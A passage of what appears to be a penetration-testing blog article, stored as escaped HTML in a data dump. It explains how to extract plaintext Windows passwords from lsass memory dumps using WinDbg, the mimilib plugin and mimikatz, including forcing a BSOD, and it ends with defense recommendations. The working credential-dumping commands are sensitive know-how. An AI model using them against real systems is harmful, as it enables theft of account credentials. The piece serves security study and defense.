interface\u003C\u002Fp>\u003Cp>File-&gt;Symbol File Path ...\u003C\u002Fp>\u003Cp>Enter SRV*c:\\mysymbol*http:\u002F\u002Fmsdl.microsoft.com\u002Fdownload\u002Fsymbols\u003C\u002Fp>\u003Cp>After setup, required symbol files will automatically download from the Microsoft public symbol server\u003C\u002Fp>\u003Cp>Reload:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.Reload\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Test:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>!process 0 0 lsass.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Loaded normally, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017362654_2_3101ff7258-1.jpeg\">\u003C\u002Fp>\u003Cp>If this part still fails, try using a VPN to connect to the internet\u003C\u002Fp>\u003Cp>If the test environment cannot connect to the internet, symbol files can be downloaded by obtaining manifest files via SymChk\u003C\u002Fp>\u003Cp>Reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows-hardware\u002Fdrivers\u002Fdebugger\u002Fusing-a-manifest-file-with-symchk\u003C\u002Fp>\u003Cp>Execute on computer A (without internet connection):\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>SymChk \u002Fom c:\\Manifest\\man.txt \u002Fid c:\\test\\MEMORY.DMP\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Obtain the file c:\\Manifest\\man.txt, copy it to computer B (with internet connection), and execute the following command on computer B:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>SymChk \u002Fim c:\\test\\man.txt \u002Fs srv*c:\\mysymbolNew*https:\u002F\u002Fmsdl.microsoft.com\u002Fdownload\u002Fsymbols\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>A new folder c:\\mysymbolNew will be generated. Copy it to computer A, start WinDbg on computer A, and specify the new symbol file location as c:\\mysymbolNew with the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.symfix c:\\mysymbolNew\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Test:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.Reload\u003Cbr>!process 0 0 lsass.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Loaded normally, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017391534_3_aaf1f568cc-1.jpeg\">\u003C\u002Fp>\u003Ch3>4. Load mimilib plugin\u003C\u002Fh3>\u003Cp>Refer to the previous article 'Mimilib Utilization Analysis'\u003C\u002Fp>\u003Ch3>(1) Method 1\u003C\u002Fh3>\u003Cp>Save mimilib.dll to the winext directory of WinDbg\u003C\u002Fp>\u003Cp>The saved path in my test environment (Server2012R2x64) is: C:\\Program Files\\Debugging Tools for Windows (x64)\\winext\u003C\u002Fp>\u003Cp>Start WinDbg\u003C\u002Fp>\u003Cp>The command to load the plugin is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.load mimilib\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>(2) Method 2\u003C\u002Fh3>\u003Cp>Directly load the absolute path of mimilib, example as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.load c:\\test\\mimilib\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>In summary, the complete command to set up the configuration environment and export passwords is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.sympath SRV*c:\\mysymbol*http:\u002F\u002Fmsdl.microsoft.com\u002Fdownload\u002Fsymbols\u003Cbr>.reload\u003Cbr>!process 0 0 lsass.exe\u003Cbr>.process 890f4530\u003Cbr>.load c:\\test\\mimilib\u003Cbr>.reload\u003Cbr>!mimikatz\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The complete process is shown in the following figure:\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017417953_4_294dd38340-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017462794_5_b1efcc088e-1.jpeg\">\u003C\u002Fp>\u003Cp>To save the output results to a file, you can use the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.logopen c:\\test\\log.txt\u003Cbr>!mimikatz\u003Cbr>.logclose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x04 Exploitation Approach\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Extracting passwords from user-mode dump files\u003C\u002Fh3>\u003Cp>Obtain a dump file of the lsass.exe process via the API MiniDumpWriteDump()\u003C\u002Fp>\u003Cp>Use mimikatz to extract passwords from the dump file with the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe log \"sekurlsa::minidump lsass.dmp\" \"sekurlsa::logonPasswords full\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Extracting passwords from kernel-mode dump files\u003C\u002Fh3>\u003Cp>Enable the dump file functionality\u003C\u002Fp>\u003Cp>Force a system Blue Screen of Death (BSOD)\u003C\u002Fp>\u003Cp>Load the dump file using WinDbg and invoke mimilib to export plaintext passwords\u003C\u002Fp>\u003Ch2>0x05 Defense Recommendations\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Extracting passwords from user-mode dump files\u003C\u002Fh3>\u003Cp>Intercept the behavior of the API MiniDumpWriteDump(); some security products already support this feature\u003C\u002Fp>\u003Ch3>2. Extracting passwords from kernel-mode dump files\u003C\u002Fh3>\u003Cp>Enable dump encryption\u003C\u002Fp>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows-server\u002Fvirtualization\u002Fhyper-v\u002Fmanage\u002Fabout-dump-encryption\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If an attacker gains administrator privileges on the system, they can disable dump encryption\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduced methods for extracting passwords from user-mode dump files and kernel-mode dump files, and provided defense recommendations based on exploitation techniques\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",906,"Onedaysec",5,"published","2026-02-02T07:38:21.454Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Extract Passwords from Kernel Dump Files Using Mimilib & WinDbg","mimilib, WinDbg, dump files, password extraction, kernel-mode, BSOD, penetration testing, security",null,false,[],{"docs":43,"hasNextPage":40},[44,45,4,46,47],618,617,615,614,{"title":39,"description":39,"image":39},"2026-07-24T15:37:12.347Z","2026-07-23T16:01:50.653Z","draft","2026-07-23T16:13:47.538Z"]